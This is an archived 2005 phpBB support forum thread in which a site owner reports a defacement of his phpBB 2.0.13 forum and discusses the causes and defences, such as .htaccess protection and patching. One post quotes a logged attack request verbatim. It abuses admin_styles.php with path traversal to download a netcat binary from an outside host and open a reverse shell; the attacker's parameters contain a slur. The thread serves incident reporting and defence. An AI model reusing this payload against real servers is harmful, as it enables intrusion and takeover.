2.0.13 hacked - lots of abdi_api defacement on 4/3/05

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

2.0.13 hacked - lots of abdi_api defacement on 4/3/05

Post by scumola »

My site was hacked and defaced with lots of Abdi_api messages. Google search finds others with this same defacement - they re-named the forums and "cleaned" lots of messages from the forum - since I have no backup, they're lost for good.

http://www.google.com/search?hl=en&q=Ab ... gle+Search

Need someone to make a patch for this hack asap please!

- Steve
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Yes, it was 2.0.13

Post by scumola »

I'm not releasing the name/ip of my site (so he/she doesn't come and re-compromise it), but it WAS 2.0.13. I can send apache logs if a developer is interested in the POST commands that were used to get in.

- Steve
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

More analysis

Post by scumola »

So, the first few pages that were accessed by the hacker/defacer was a backup of the databse (my admin/ dir had no .htaccess in it, and was apparently compromisable). From there, I'm guessing that since he/she had the backup of the whole thing, he/she could do whatever he/she wanted to do.

Perhaps the phpBB install/upgrade should make sure that there is a .htaccess file in the admin dir? Just an idea.

- Steve
chrisjlocke
Registered User
Posts: 532
Joined: Fri Sep 24, 2004 3:45 pm
Location: Essex, UK
Contact:

Post by chrisjlocke »

What should be in this .htaccess file, and exactly which directory should it go?
I've just had someone forward their logs to me after they were hacked (same thing as you - backup first) so wondered what the 'prevention' was...
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

... also ...

Post by scumola »

... and an attempt at cracking the actual machine:

GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=
../../../../../../../../../../../../../../../../../../../tmp&sid=
65411e085893e1cf1c9d8b8b2a6f5b1d&niggaip=63.228.89.225&
niggaport=8888&nigga=$a=fopen(\"http://overdose.tcpteam.org/
background/nc.elf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread
($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);
fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".
$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1
Last edited by scumola on Wed Apr 06, 2005 7:58 pm, edited 1 time in total.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

The .htaccess file ...

Post by scumola »

The .htaccess file in the admin dir is just there to have the web server query the user for a user id & password. It's difficult for "scripts" to get past this type of authentication.

Here are some links to the .htaccess file info so you can make your own:

http://httpd.apache.org/docs/howto/htaccess.html
http://www.javascriptkit.com/howto/htaccess.shtml
http://apache-server.com/tutorials/ATus ... ccess.html

Create a .htaccess and .htpasswd file - put the .htaccess file in the admin/ dir and the first time you go to the /admin/ dir in your browser (the browser will remember until you kill your browser session) you'll be prompted for a user id & password (that you create).

- Steve
geocator
Registered User
Posts: 16242
Joined: Fri Jan 09, 2004 11:56 pm
Location: On dry land
Contact:

Post by geocator »

That GET string is for an exploit that was patched in 2.0.13. So maybe you did not update. Also you may find out it was not through phpBB that they hacked your site. However I would recomend that you post in the security tracker with all the details you have so the devs can look into it.
chrisjlocke
Registered User
Posts: 532
Joined: Fri Sep 24, 2004 3:45 pm
Location: Essex, UK
Contact:

Post by chrisjlocke »

Thanks scumola for that - much appreciated.
Your post under mine is very similar to the attack in the logs I was sent.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

2.0.13

Post by scumola »

I checked, and the version is indeed 2.0.13. Perhaps they just tried that string to see if it would work or not. Either way, my site was hacked and I lost LOTS of inportant info and I'd like to see whatever it was fixed.

Let me know where to post the logs that I have.

- Steve
geocator
Registered User
Posts: 16242
Joined: Fri Jan 09, 2004 11:56 pm
Location: On dry land
Contact:

Post by geocator »

scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

Check. I submitted my logs. Thanks for the info.

- Steve
The Techboy
Registered User
Posts: 207
Joined: Tue May 04, 2004 7:37 pm

Re: 2.0.13

Post by The Techboy »

scumola wrote: I checked, and the version is indeed 2.0.13. Perhaps they just tried that string to see if it would work or not. Either way, my site was hacked and I lost LOTS of inportant info and I'd like to see whatever it was fixed.

Let me know where to post the logs that I have.

- Steve


K, scumola. Let me just clarify what geocator said, in nice big bold letters.
That GET string is for an exploit that was patched in 2.0.13. So you did not patch properly.
Eat recycled food. It's good for the environment and OK for you.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

Let me just clarify what I said. My site WAS PATCHED. I keep it patched every time there's a phpBB2 update. It's been patched for quite a while. I tried to re-patch today and it wouldn't patch it because it was already patched! Yet, the site was still defaced and "pruned" just two days ago!

It's very possible that they just tried the older exploit to see if it would work, not knowing which version is on my site. I'm not saying that that specific GET did the trick, but it was possible that it was the one. I didn't post all of my logs to this forum, but I did post all of the logs to the security page, so another GET could've done it. I'm just giving you guys the info that I have.

I'm a little upset that my forum was basically erased and your attitude isn't helping very much. Try being a little more constructive next time.
skuipers
Registered User
Posts: 648
Joined: Sun Jan 16, 2005 9:53 pm
Location: Delft, The Netherlands

Post by skuipers »

scumola wrote: I'm a little upset that my forum was basically erased and your attitude isn't helping very much. Try being a little more constructive next time.


Well, you know, you have given no proof that phpBB whas the failure in the unfortunate hack of your site.

F.i., it could have been a hack of phpmyadmin. You would be surprised to know how many sites have their phpmyadmin wide open, with the default root user (without a password) being able to access all databases (yes, please, all of you who read this, try it at your own system). It takes an experienced hacker just 10 seconds to compromise your site totally. You would not blame a hack like that on phpBB, would you? In fact, you could not even call this a hack, just extreme carelessness.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

I'm pretty sure that I don't have phpmyadmin even installed.

I checked with the security guys and they showed me that my sessions.php file didn't have the "===" change in it (shouldn't the "changed files only" patch have fixed this?).

I'm still getting auto-added users (obviously by people trying to hack the forum). Is there any way to stop these bot-added user-adds?

- Steve
Locked

Return to “2.0.x Support Forum”